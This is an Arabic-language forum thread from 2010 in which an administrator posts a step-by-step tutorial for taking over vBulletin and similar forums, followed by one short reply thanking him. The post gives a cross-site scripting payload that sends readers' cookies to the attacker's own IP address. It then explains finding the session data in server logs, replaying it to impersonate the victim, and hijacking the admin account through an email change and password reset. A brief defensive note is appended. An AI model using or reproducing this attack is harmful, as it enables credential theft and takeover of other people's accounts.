منتديات افترافيكت
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  613623

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  829894
ادارة المنتدي ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  103798
منتديات افترافيكت
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  613623

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  829894
ادارة المنتدي ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  103798
منتديات افترافيكت
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةأحدث الصورالتسجيلدخولتسجيل دخول الاعضاء
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  B7b7fr10
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  B7b711
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Pye75711
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Aswq10
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Games10
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Banr410
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  93910310
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Ouoouu10

 

 ثغرة لإختراق كل المنتديات وخصوصاًvBulletin

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
amralizxz
المدير العام
المدير العام
amralizxz


رقم العضوية : 1
الدولة : اليمن
الدولة : ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Sy10
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Biko310
sms sms : مرحبا بالاعضاء والزوار الكرام

الجنس الجنس : ذكر عدد المساهمات : 548
نقاط : 2788
تاريخ التسجيل : 22/09/2009
العمر : 33

ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Empty
مُساهمةموضوع: ثغرة لإختراق كل المنتديات وخصوصاًvBulletin    ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Emptyالسبت سبتمبر 25, 2010 7:23 am

ثغرة لإختراق كل المنتديات وخصوصاًvBulletin
======================
بسم الله الرحمن الرحيم ..

يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...

---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>@_@@_@@_@@_@@_@@_@@_@@_@.write('<img
src="http://my_ip_address/'+@_@@_@@_@@_@@_@@_@@_@@_@.@_@@_@@_@@_@@_@@_@+'">';</script>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb








ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54








20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://effects.yoo7.com
طة

طة


ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  G10
sms sms : لااله الا الله محمد رسول الله
الجنس الجنس : ذكر عدد المساهمات : 30
نقاط : 63
تاريخ التسجيل : 22/09/2009
العمر : 33

ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Empty
مُساهمةموضوع: رد: ثغرة لإختراق كل المنتديات وخصوصاًvBulletin    ثغرة لإختراق كل المنتديات وخصوصاًvBulletin  Emptyالأحد أكتوبر 03, 2010 5:42 am

مشكوووووووووور موضوع حلو مره بس قديم شوي ياليت تعطينا دروس 2010
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات افترافيكت :: المنتدى العام :: منتدى الحوارات العامة-
انتقل الى: